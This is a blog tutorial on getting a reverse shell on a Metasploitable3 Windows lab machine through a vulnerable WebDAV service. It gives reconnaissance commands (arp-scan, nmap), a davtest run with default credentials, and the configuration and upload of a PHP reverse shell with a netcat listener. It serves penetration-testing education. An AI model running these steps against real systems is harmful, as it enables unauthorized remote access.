Omar.A Jan 4, 2024

Reverse Shell on MetaSploitable3 Windows

Reverse Shell on MetaSploitable3 Windows

In-Depth Steps for WebDAV Exploitation

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we’ll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.

Information Gathering

Step 0: Check Router IP from eth0 on your Kali Machine

ip addr

Example Results:

inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0

Step 1: Quick arp-scan

arp-scan 192.168.1.1/24

Example Results:

192.168.1.3     02:f9:8e:69:9e:55       (Unknown: locally administered)
192.168.1.1     e0:19:54:46:e5:6e       zte corporation
192.168.1.11    08:00:27:e7:c3:e8       PCS Systemtechnik GmbH

Step 2: Nmap Scan for All Ports and OS Detection

nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt

Example Results:

Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1

// Also the open port 8585 for the WebDav 
PORT     STATE SERVICE REASON         VERSION
8585/tcp open  unknown syn-ack ttl 64

Nmap scan report for 192.168.1.11:

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:

Step 3: Davtest for WebDAV

davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads

Example Results:

Testing DAV connection
OPEN            SUCCEED:                http://192.168.1.11:8585/uploads

WebDAV Exploitation

Step 4: Copy PHP Reverse Shell to Desktop

cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop

Step 5: Edit PHP Reverse Shell

Edit /home/kali/Desktop/php-reverse-shell.php:

$ip = '192.168.1.10';  // Kali machine IP
$port = 7779;           // TCP/UDP Port
$shell = 'cmd.exe';     // Use cmd.exe for Windows

Step 6: Start Netcat Listener on Kali

nc -lvnp 7779

Step 7: Upload PHP Reverse Shell Using Cadaver

cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php

Step 8: Check Netcat Listener for Shell

nc -lnvp 7779

Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.

Explanation:

  1. Information Gathering:

    • Step 0: Check the router IP to identify the local network’s subnet.
    • Step 1: Use arp-scan to discover active hosts on the network.
    • Step 2: Perform an Nmap scan to find open ports and detect the operating system.

  2. WebDAV Exploitation:

    • Step 3: Use davtest to verify that the WebDAV service is accessible.
    • Step 4: Copy a PHP reverse shell script to the attacker’s machine.
    • Step 5: Edit the PHP script with the attacker’s IP and desired port.
    • Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
    • Step 7: Upload the modified PHP script to the target using Cadaver.
    • Step 8: Check the Netcat listener for a successful reverse shell.

Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.

Related Posts

Back to top